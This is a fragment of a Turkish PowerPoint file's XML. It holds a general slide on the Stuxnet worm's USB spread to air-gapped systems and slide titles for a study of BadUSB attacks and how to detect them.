              </a:rPr>
              <a:t>solucan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazılımı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>türüdür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>solucan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazılımı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> İran </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>birlikte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>başka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ülkeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hatta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ABD’yi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> bile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etkilemiştir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ancak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırıdan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etkilenen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> İran </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olmuştur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Stuxnet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yarı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>özerk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>uzak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sistemlere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>nüfuz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bunlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sağlamak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tasarlanmış</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>karmaşık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>programıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Seçilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hedeflere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>karşı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>uzayda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hedeflenebilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>nesil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> 'fire-and-forget' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kötü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>amaçlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazılım</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>türünü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>temsil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>eder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Stuxnet'in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hedeflediği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kişiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>boşluğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bulunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kesim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>idi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>başka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>deyişle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>halka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>açık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>internete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bağlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>değillerdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>penetrasyon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>erişim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sağlamak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sağlamak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gibi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aracı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanılmasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gerektiriyordu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Stuxnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>solucanı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>önce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilinmeyen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>açıklarından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yararlandı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>nedenle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yamaları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>geliştirmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> zaman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olmadı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="SUTUKSNET (STUXNET) NEDİR? —– ALINTIDIR | Abdullah Işık Kişisel Blog Sayfası">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7631D98B-A8DB-4BA4-87FF-1E94F9999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667" y="2934661"/>
            <a:ext cx="3964608" cy="25513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3527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6542</TotalTime>
  <Words>3811</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Geniş ekran</PresentationFormat>
  <Paragraphs>179</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Bookman Old Style</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Damask</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>özet</vt:lpstr>
      <vt:lpstr>Giriş</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Amaç </vt:lpstr>
      <vt:lpstr>USB Protokolü</vt:lpstr>
      <vt:lpstr>USB Güvenlik açıklarının keşfi</vt:lpstr>
      <vt:lpstr>USB İle Yapılan Önemli Siber Saldırılar ve Saldırıların Verimliliği </vt:lpstr>
      <vt:lpstr>Yöntem</vt:lpstr>
      <vt:lpstr>BADUSB KAvramı</vt:lpstr>
      <vt:lpstr>BADUSB nedir? </vt:lpstr>
      <vt:lpstr>Digispark Attiny85  </vt:lpstr>
      <vt:lpstr>BADUSB Siber saldırı senaryolarının oluşturulması</vt:lpstr>
      <vt:lpstr>Hedef sistem üzerinde dosya indirme </vt:lpstr>
      <vt:lpstr>Hedef sistem üzerinde ters kabuk (reverse shell) alma yöntemi </vt:lpstr>
      <vt:lpstr>USB saldırılarını önleme yöntemlerinin incelenmesi  </vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Kural Tabanlı tespit mekanizmaları</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Tuş vuruşu dinamikleri tabanlı tespit mekanizmaları</vt:lpstr>
      <vt:lpstr>İçerik analizi tabanlı tespit mekanizmaları</vt:lpstr>
      <vt:lpstr>Hibrit tespit mekanizmaları</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GDPR</dc:title>
  <dc:creator>KEMAL KARAÇUHA</dc:creator>
  <cp:lastModifiedBy>Kemal KARACUHA</cp:lastModifiedBy>
  <cp:revision>152</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-13T12:53:30Z</dcterms:created>
